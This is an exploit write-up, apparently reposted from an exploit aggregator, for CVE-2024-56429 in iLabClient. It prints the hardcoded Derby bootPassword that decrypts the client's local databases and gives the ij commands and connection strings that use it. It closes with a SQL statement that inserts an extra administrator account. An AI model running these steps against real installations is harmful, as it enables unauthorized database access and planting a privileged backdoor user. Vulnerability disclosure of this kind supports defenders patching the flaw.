Share
## https://sploitus.com/exploit?id=6DC1EE81-11C0-58CD-9AA4-922DBEC0966C
CVE-2024-56429
==============
***Access to the local database of the iLabClient***

<br>

### Extract database password
The iLabClient uses an Apache Derby database to store the locally required data. To ensure the encryption, a 
`bootPassword` is used for the creation, which can be extracted from the source code
(the extracted code is in `DecyptedBootPassword.java`). After executing the extracted source code
the user receives the `bootPassword`.

```
jdbc:derby:iLabClient;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==
```
<br>

### Connect to the database
By starting the iLabClient the first time the two local databases `iLabCLient` and `iLabDB` were created. 
To connect to these databases the tool `ij` from Apache Derby can be used, [Download](https://db.apache.org/derby/releases/release-10_14_2_0.html).

Starting `ij`:
```
"C:\ilabClient\java8u422\bin\java.exe" -jar "...\db-derby-10.14.2.0-lib\lib\derbyrun.jar" ij
```
`"C:\ilabClient\java8u422\bin\java.exe"`: Installed and used Java version from iLabClient<br>
`"...\db-derby-10.14.2.0-lib\lib\derbyrun.jar"`: Apache Derby Library

Connect to database:
```
cd "C:\ilabClient\db
connect 'jdbc:derby:iLabClient;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==';
connect 'jdbc:derby:iLabDB;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==';
```
<br>

### Manipulate data (example)
Once the connection has been established, the data can be read and manipulated. For example, by adding another user with 
more rights.

```
 insert into users (USERID, BENUTZER, NAME, PARAMS, HASH) values (4, 'admin2', 'Administrator', '111111111111111111', 'SHA-256:B6382EC801B1BBD5C464C6A5F9C8CFFDC603A7D3A4916B1F50BD592678E8380B');
```
The required hash can be created with the class `GenerateUserData.java`.

------

Discoverer: Lisa Ulbrich (Lufthansa Industry Solutions AS GmbH)